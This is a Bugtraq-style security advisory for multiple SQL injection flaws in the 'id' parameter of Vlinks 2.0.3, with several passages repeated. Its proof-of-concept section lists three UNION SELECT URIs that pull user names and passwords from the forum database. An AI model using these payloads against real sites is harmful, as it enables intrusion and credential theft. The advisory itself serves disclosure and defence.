Vlinks 'id' Parameter Multiple SQL Injection Vulnerabilities
BID:55236
Info
Vlinks 'id' Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 55236 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 27 2012 12:00AM |
| Updated: | Aug 27 2012 12:00AM |
| Credit: | JiKo |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Vlinks 'id' Parameter Multiple SQL Injection Vulnerabilities
Vlinks is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Vlinks 2.0.3 is vulnerable; other versions may also be affected.
Vlinks is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Vlinks 2.0.3 is vulnerable; other versions may also be affected.
Exploit / POC
Vlinks 'id' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/forum/site.php?ps=1&idc=1&id=-991 union select0,concat(pseudo,0x3a,passe),2,3,4,5,6,7,8,9,10,11 from infos--
http://www.example.com/forum/admin/admin_modif_categorie.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2 from infos--
http://www.example.com/forum/admin/admin_modif_partenaire.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6 from infos--
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/forum/site.php?ps=1&idc=1&id=-991 union select0,concat(pseudo,0x3a,passe),2,3,4,5,6,7,8,9,10,11 from infos--
http://www.example.com/forum/admin/admin_modif_categorie.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2 from infos--
http://www.example.com/forum/admin/admin_modif_partenaire.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6 from infos--
Solution / Fix
Vlinks 'id' Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].